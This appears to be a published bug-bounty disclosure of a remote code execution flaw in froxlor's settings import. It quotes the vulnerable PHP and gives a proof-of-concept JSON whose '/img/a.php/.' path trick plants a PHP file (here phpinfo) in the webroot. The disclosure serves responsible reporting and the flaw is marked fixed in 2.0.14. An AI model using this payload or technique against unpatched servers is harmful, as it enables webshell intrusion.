Remote Code Execution Vulnerability Through Unrestrict File Write in froxlor/froxlor

Valid

Reported on

Mar 4th 2023


Description

In the import setting function, in the file Froxlor\lib\Froxlor\SImExporter.php

file_put_contents($img_filename, $img_data);

if (function_exists('finfo_open')) {
    $finfo = finfo_open(FILEINFO_MIME_TYPE);
    $mimetype = finfo_file($finfo, $img_filename);
    finfo_close($finfo);
} else {
    $mimetype = mime_content_type($img_filename);
}
if (empty($mimetype)) {
    $mimetype = 'application/octet-stream';
}
if (!in_array($mimetype, ['image/jpeg', 'image/jpg', 'image/png', 'image/gif'])) {
    @unlink($img_filename);
    throw new Exception("Uploaded file is not a valid image");
}

$spl = explode('.', $img_filename);
$file_extension = strtolower(array_pop($spl));
unset($spl);

if (!in_array($file_extension, [
    'jpeg',
    'jpg',
    'png',
    'gif'
])) {
    @unlink($img_filename);
    throw new Exception("Invalid file-extension, use one of: jpeg, jpg, png, gif");
}

the code first writes the data provided by the user to the file path provided by the user

And then verifies the file extension. If failed, it will delete that file through unlink function.

Unfortunately, there is a small trick between the file_put_content and unlink functions. If we set the file path to /img/a.php/., the file_put_content function can save the file in /img/a.php, but the unlink function cannot delete /img/a.php.

Proof of Concept

So, here are our proof of concept.

{
    "panel.version": "2.0.13",
    "panel.db_version": "202302030",
    "_sha": "bd48ad3bab8de5e10cd3e7882c19dd9457145d3d",
    "a.b.image_data": "R0lGODlhCjw/cGhwIHBocGluZm8oKTs=",
    "a.b": "/img/a.php/."
}

If we import this file in the settings panel, it will write the content of <?php phpinfo(); into img/a.php in the webserver.

attack video: https://drive.google.com/file/d/19ScE3oZ_G1VBk124QU35--cbQZ9T1Z4e/view?usp=sharing

Also, it's worth noting that we can still exploit this vulnerability if there are no tricks for the unlink function. Because the code first writes the file and then deletes it, the time gap is enough for us to access our webshell through multi-threading. Hope this gets noticed when it's fixed.

Impact

This vulnerability can be exploited to cause a Remote Code Execution on target web server.

References

We are processing your report and will contact the froxlor team within 24 hours. 2 months ago
RenHao modified the report
2 months ago
We have contacted a member of the froxlor team and are waiting to hear back 2 months ago
froxlor/froxlor maintainer has acknowledged this report 2 months ago
Michael Kaufmann validated this vulnerability 2 months ago
RenHao has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Michael Kaufmann marked this as fixed in 2.0.14 with commit f36bc6 2 months ago
The fix bounty has been dropped
This vulnerability has been assigned a CVE
This vulnerability is scheduled to go public on Apr 14th 2023
SImExporter.php#L197 has been validated
RenHao
2 months ago

Researcher


If possible, can the vulnerability go public as early as possible? I really need the CVE, please!

Michael Kaufmann published this vulnerability a month ago
to join this conversation